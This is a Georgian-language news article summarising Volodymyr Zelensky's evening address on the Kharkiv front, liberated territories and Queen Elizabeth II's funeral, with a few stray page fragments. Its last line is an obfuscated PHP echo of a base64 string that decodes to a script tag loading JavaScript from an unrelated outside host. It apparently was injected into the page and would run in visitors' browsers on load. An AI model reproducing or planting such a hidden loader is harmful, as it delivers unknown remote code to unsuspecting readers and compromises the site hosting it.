celsiusi
ავერსი საქკაბელი
ხარკოვის რეგიონში არსებული ვითარება, დეოკუპირებული ტერიტორიები და დედოფალ ელისაბედის გასვენება - უკრაინის პრეზიდენტის საღამოს მიმართვის მთავარი თემები იყო.
 
ვოლოდიმირ ზელენსკიმ კიდევ ერთხელ გამოუცხადა მწუხარება ბრიტანელ ხალხს, რაც შეეხება უკრაინას, მისი თქმით, უკვე აშკარაა, რომ ოკუპანტები უკრაინულ მიწაზე ფეხს ვერ მოიკიდებენ: 
 
"ხარკოვის რეგიონი - ჩვენ ვასტაბილურებთ სიტუაციას, ვიკავებთ ჩვენს პოზიციებს. მტკიცედ. იმდენად ძლიერად, რომ ოკუპანტები საგრძნობლად პანიკაში არიან. ახლა ჩვენ დარწმუნებული ვართ, რომ ოკუპანტები უკრაინის მიწაზე ფეხს ვერ მოიკიდებენ.
 
ტემპი ახლა ძალიან მნიშვნელოვანია. გათავისუფლებულ ტერიტორიებზე სტაბილიზაციის ტემპი. ჩვენი ჯარების მოძრაობის ტემპი. გათავისუფლებულ ტერიტორიაზე ნორმალური ცხოვრების აღდგენის ტემპი.
 
ამ დღეებში ლონდონში დედოფალ ელიზაბეტ II-ის გამოსამშვიდობებელი ცერემონია გაიმართა. უკრაინამ მის ხსოვნას მაღალი დონის პატივი მიაგო - ესწრებოდნენ უკრაინის პრემიერ-მინისტრი და პირველი ლედი.
 
მის უდიდებულესობას გამოსამშვიდობებლად მისულ მილიონობით ადამიანს შორის ბევრი უკრაინელი იყო. მადლობას ვუხდი ყველა უკრაინელს გაერთიანებულ სამეფოში, რომლებმაც აჩვენეს ჩვენს ბრიტანელ მეგობრებს ამ სამწუხარო მომენტში, რომ უკრაინა მათთანაა." აცხადებს ვოლოდიმირ ზელენსკი საღამოს ვიდეომიმართვაში.
456
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");